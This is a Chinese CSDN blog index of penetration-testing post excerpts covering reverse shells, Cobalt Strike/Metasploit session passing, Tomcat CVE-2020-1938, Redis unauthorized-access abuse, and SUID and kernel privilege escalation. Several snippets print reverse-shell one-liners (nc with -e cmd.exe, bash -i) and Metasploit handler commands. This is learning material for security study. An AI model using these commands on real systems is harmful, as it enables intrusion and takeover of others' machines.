![](https://img-blog.csdnimg.cn/20201014180756780.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
渗透测试
文章平均质量分 57
想冲大厂的癞蛤蟆
非知功,焉知防
展开
-
HTA(html应用程序)攻击
HTA 介绍HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别大多数的Windows操作系统都支持Hta文件执行,可双击运行hta应用或命令行窗口mshta.exe解析执行文件,这里的.hta文件可以是本地的也可以是可访问的远程主机上的HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多。它具有桌面程序的所有权限(读写文件、操作注册表等)HTA原创 2021-02-23 13:35:31 · 3761 阅读 · 0 评论 -
CS与MSF联动之派生会话
CS 派生会话到MSF当我们CS上线后,先打开msf,启动监听模块use exploit/multi/handler set payload windows/meterpreter/reverse_httpset lhost xxxxset lport xxxxexploit然后在CS新建一个外部监听两边的payload协议一定要对应的然后选择需要派生的会话右击—>Spawn然后选择刚刚创建的监听MSF 派生会话给CS先在 cs 开启监听,Cobalt Strike-&g原创 2021-02-19 14:17:06 · 1649 阅读 · 0 评论 -
实战复现Aapache Tomcat AJP(CVE-2020-1938)
漏洞简介Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器。由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。影响范围Apache Tomcat 6Apache Tomcat 7 < 7.0.100Apache Tomcat 8 < 8.5.51Apache Tomcat 9 < 9.0.31实战复现先通过扫描端口看到目标原创 2020-12-07 10:22:19 · 335 阅读 · 0 评论 -
通过stty将shell升级为完全交互式shell
当我们反弹回了一个shell连接,以及通过id命令查看到一个令人满意的用户权限。但凡事总有意外,由于我们获取的shell并不是一个具有完整交互的shell,因此可能会在使用过程中被挂起,甚至还可能会因为我们的操作失误,例如不小心摁下了 “Ctrl-C”键,这将直接终止我们的整个shell进程。做个小实验攻击机:kali (10.92.0.73)靶机:ubuntu (10.92.0.74) 简单shell首先给kali反弹个普通shellUbuntu:bash -i >&原创 2020-09-23 11:42:04 · 1159 阅读 · 0 评论 -
反弹shell姿势小总结
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个可交互式shell。反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。(本文所有姿势整理自实验笔记与网络) 一、Windows反弹shell0x1 nc反弹nc 192.168.0.1 1234 -e c:\windows\system32\cmd.exe0x2 powershell反弹(现在较为常用,常用来上线cs)这里通过利用powercat进行反弹shell,powe原创 2020-09-23 10:51:05 · 1187 阅读 · 0 评论 -
Linux之SUID提权
0x00 SUID是什么?SUID其实和文件或目录的基本属性一样(r w x) ,当一个可执du行的文件(命令)拥有SUID时,x就变成s了,你试下:ll /usr/bin/passwd 就知道,意思就是当你执行这个命令时暂时拥有passwd的拥有者的权限,也就是root 0x01 suid提权运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行)搜索符合条件的可以用来提权的:(三种都可以)find / -perm -u=s -type f 2>/原创 2020-08-25 11:28:14 · 762 阅读 · 0 评论 -
Linux内核提权漏洞发现与利用
漏洞发现针对相应系统版本的cve提权漏洞uname -a 所有版本uname -r 内核版本信息cat /proc/version 内核信息Linux Exploit Suggester下载linux-exploit-suggester.sh文件wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh若出现无法连上服务器时(这个当然要在root原创 2020-07-14 12:41:47 · 853 阅读 · 0 评论 -
Linux信息收集
关于信息收集的相关命令。有待更新。。。一、获取内核,操作系统和设备信息uname -a 所有版本uname -r 内核版本信息uname -n 系统主机名字uname -m Linux内核架构版本信息内核信息cat /proc/versionCPU信息cat /proc/cpuinfocat /etc/*-releasecat /etc/issue发布信息主机名 hostname文件系统 df -a内核日志 dmesg 或 /var/log/dmesg二、用户和组列出系统原创 2020-07-12 21:29:07 · 222 阅读 · 0 评论 -
如何识别绕过CDN
cdn有啥用?一、开启CDN后的网站,用户所在地的不同访问CDN的节点服务器,并不直接访问源服务器,这样不仅减少了服务器宽带资源,降低服务器压力。二、其次,由于CDN节点的阻挡防护,可以更好的保护员服务器的安全。具体来说,CDN其实是充当了一个替身的角色,在无法知道源服务器ip时,无论服务器是渗透还是DDoS攻击,攻击的目标都将是CDN节点,攻击的并非服务器本身。 如何识别?1. 通过ping命令在返回信息内可以看到其实ping的是他它的一个cdn服务器2.nslookupWin原创 2020-07-10 17:37:16 · 683 阅读 · 0 评论 -
windows PR提权
漏洞概述Microsoft Windows RPCSS服务隔离本地权限提升漏洞RPCSS服务没有正确地隔离 NetworkService 或 LocalService 帐号下运行的进程,本地攻击者可以利用令牌劫持的方式获得权限提升。成功利用此漏洞的攻击者可以完全控制受影响的系统,攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。受影响系统Microsoft Windows XP x64 SP2Microsoft Windows XP x64Microsoft Wind原创 2020-07-09 11:13:03 · 1091 阅读 · 0 评论 -
windows内核提权漏洞发现与利用
漏洞介绍计算机有个地方叫作缓存区。程序缓存的大小是事先设置好的,若用户输入数据的大小超过缓存区的大小则会发生溢出 漏洞影响系统内核溢出漏洞提权是一种通用的提权方法,攻击者通常可以使用这类方法绕过系统的所有安全限制。攻击者利用漏洞的关键是目标系统没有及时安装补丁,就会让攻击者有机可乘。如果攻击者想要通过这种方法提权,就必须找出目标中的0day漏洞 漏洞发现0x01 手动执行命令发现缺失补丁通过各种手段获取目标主机shell后,查看当前权限通过systeminfo查看机器原创 2020-07-07 14:03:52 · 1287 阅读 · 0 评论 -
Netcat安装使用详解
Netcat从网络的一段读取数据,输出到网络的另一端(可以使用于TCP和UDP协议) 安装Windows可自行在github上下载netcatkali linux上方法一:sudo yum install nc.x86_64方法二:wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gztar z原创 2020-07-06 10:52:12 · 1518 阅读 · 0 评论 -
渗透测试项目基本流程——无提供实践流程
渗透测试项目基本流程——无提供实践流程 ——“你好,初来乍到。本小菜鸡博客主要记录自己学习路程的笔记,时间过程与一些小小的感悟” X01 前期交互阶段前期交互阶段要做的事主要有以下几件:1.介绍和解释可用的工具和技术,根据客户需求为客户提供量身定制的测试方案(提示事项:可用于渗透测试的工具和技术有很多,但客户环境不一定支持,比如设备老旧,不能使用工具进行高强度的扫...原创 2020-04-26 11:32:04 · 859 阅读 · 0 评论 -
Redis未授权访问之ssh免密登录(踩坑)
关于Redis漏洞的详解及写shell、getshell的利用请出示门票:传送门利用原理利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器。利用实验场景Redis服务器(靶机):Ubuntu 16.4 ----- 192.168.101.46Redis客户机(攻击机):Ubuntu 16.4 ----- 192.168.原创 2020-06-29 16:13:08 · 4244 阅读 · 0 评论 -
github上的信息收集
在一个交流群上,看到有位老哥在github上找某SRC厂商的信息泄露,俗称“捡垃圾”,报上高危,换算过来赏了xxxx软妹币。有点心动?所以今天也学习除了google hack以外的关于github上敏感信息的一些搜索语法(主要也是结合google)Github是一个分布式的版本控制系统,目前拥有上百万万开发者用户。当今大规模数据泄露事情一直在发生,从未停止过,但有些人不知道的是很多时候一些敏感信息的泄露其实是我们自己无意中造成的,然而一个小疏忽,往往却造成一系列连锁反应……Github上敏感信息的泄露原创 2020-06-19 13:15:21 · 1593 阅读 · 1 评论 -
Redis未授权访问之反弹shell
Redis简介Redis 是一个高性能的key-value数据库。为了保证效率,数据都是缓存在内存中。redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步 漏洞简介1、什么是redis未授权访问漏洞Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证,会导致任意原创 2020-06-17 12:17:11 · 1981 阅读 · 0 评论 -
内网渗透之隐藏隧道技术
个人学习笔记及归纳总结,学习内网渗透的必备基础(干货) 隐藏隧道技术即是,绕过端口屏蔽的通信方式判断内网连通性imcpping [ip]tcp nc -zv [ip] [port]httpcurl 支持文件上传和下载等。linux自带,windows须安装curl [域名:端口]设代理 curl -x [proxy-ip:port] [域名]dn...原创 2020-05-07 17:44:28 · 1753 阅读 · 2 评论 -
Windows信息收集
个人在内网渗透中收集的命令,欢迎补充~查看本机信息ipconfig /all查看网络配置systeminfo 查看系统信息wmic product get name,version 查看安装的软件及版本信息wmic service list brief 查看本机服务信息tasklist 查看当前进程wmic process list brief 查看进程信息wmic startup...原创 2020-05-07 16:57:49 · 438 阅读 · 0 评论 -
VulnHub_DC靶机系列(dc-1)
由于是学生党,只除了网上挖洞以外,看来只能自己搭环境或者网上下载靶机来做实验。虽然与真实场景相差很大,但是也是一种提高实战能力的途径之一。 X00靶机环境接下来用DC-1靶机做渗透的一个实验及记录先在VulnHub上下载dc-1靶机(最好使用Virtualbox,避免卡顿)下载地址:https://www.vulnhub.com/entry/dc-1-1,292...原创 2020-04-29 11:38:47 · 645 阅读 · 0 评论